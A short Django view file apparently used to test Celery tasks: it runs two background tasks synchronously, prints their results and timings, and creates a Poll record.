from .tasks import gen_num, gen_letters
from django.http import HttpResponse
from django.views import View
import time
from .models import Poll
from django.contrib.auth.models import User
class TestCelery(View):
def get(self, request):
print('started test1')
print(time.perf_counter())
res = gen_num.delay().get()
print('result is ', res)
print(time.perf_counter())
print('started test2')
print(time.perf_counter())
res2 = gen_letters.delay().get()
print('result2 is ', res2)
print(time.perf_counter())
user = User.objects.get(pk=1)
Poll.objects.create(question='2222', created_by=user)
return HttpResponse('done')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.